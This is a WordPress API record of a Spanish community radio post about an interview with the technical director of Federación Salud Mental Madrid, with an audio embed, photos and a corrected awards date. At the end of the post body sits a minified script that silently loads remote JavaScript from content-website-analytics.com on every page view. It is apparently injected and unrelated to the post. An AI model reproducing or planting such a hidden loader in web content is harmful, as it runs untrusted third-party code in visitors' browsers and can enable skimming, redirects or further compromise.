{"id":4803,"date":"2024-06-05T20:41:46","date_gmt":"2024-06-05T20:41:46","guid":{"rendered":"https:\/\/radiojabato.es\/?p=4803"},"modified":"2026-04-20T15:24:27","modified_gmt":"2026-04-20T15:24:27","slug":"radio-asamec-adriana-sanclemente-gomez-directora-tecnica-de-la-federacion-salud-mental-madrid","status":"publish","type":"post","link":"https:\/\/radiojabato.es\/?p=4803","title":{"rendered":"RADIO ASAMEC: \u00abAdriana Sanclemente G\u00f3mez, directora t\u00e9cnica de la Federaci\u00f3n Salud Mental Madrid.\u00bb"},"content":{"rendered":"\n<iframe frameborder='0' allowfullscreen='' scrolling='no' height='200' style='width:100%;' src='https:\/\/www.ivoox.com\/player_ej_129944351_6_1.html?c1=cfd97e' loading='lazy'><\/iframe>\n\n\n\n<p>Hoy hemos entrevistado a Adriana Sanclemente G\u00f3mez, directora t\u00e9cnica de la Federaci\u00f3n Salud Mental Madrid.<br>Adriana nos ha contado los pr\u00f3ximos eventos, en la entrevista hemos dado una fecha incorrecta la celebraci\u00f3n de los premios UMASAM ser\u00e1 el 11 de junio.<br>Tambi\u00e9n nos ha explicado diferentes proyectos que se est\u00e1n llevando a cabo desde la Federaci\u00f3n.<br>La importancia que tienen las asociaciones, juntos en equipo podemos trabajar por la Salud Mental.<br>La necesidad de que se doten de recursos a las Asociaciones y Federaciones.<br>Muchas gracias Adriana por compartir un ratito con nosotras, estamos muy contentas de formar parte de la Federaci\u00f3n.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"4806\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-05_22-28-34-1024x768.jpg\" alt=\"\" class=\"wp-image-4806\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-05_22-28-34-1024x768.jpg 1024w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-05_22-28-34-300x225.jpg 300w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-05_22-28-34-768x576.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-05_22-28-34.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"4805\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-05_22-28-43-768x1024.jpg\" alt=\"\" class=\"wp-image-4805\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-05_22-28-43-768x1024.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-05_22-28-43-225x300.jpg 225w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-05_22-28-43.jpg 960w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"4807\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-05_22-28-50-1024x768.jpg\" alt=\"\" class=\"wp-image-4807\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-05_22-28-50-1024x768.jpg 1024w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-05_22-28-50-300x225.jpg 300w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-05_22-28-50-768x576.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-05_22-28-50.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"275\" height=\"183\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/descarga-2.png\" alt=\"\" class=\"wp-image-4808\"\/><\/figure>\n<script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script>","protected":false},"excerpt":{"rendered":"<p>Hoy hemos entrevistado a Adriana Sanclemente G\u00f3mez, directora t\u00e9cnica de la Federaci\u00f3n Salud Mental Madrid.Adriana nos ha contado los pr\u00f3ximos eventos, en la entrevista hemos dado una fecha incorrecta la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[987],"tags":[],"class_list":["post-4803","post","type-post","status-publish","format-standard","hentry","category-asamec-asociacion-de-salud-mental-del-corredor"],"_links":{"self":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/4803","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4803"}],"version-history":[{"count":2,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/4803\/revisions"}],"predecessor-version":[{"id":14360,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/4803\/revisions\/14360"}],"wp:attachment":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4803"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4803"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4803"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}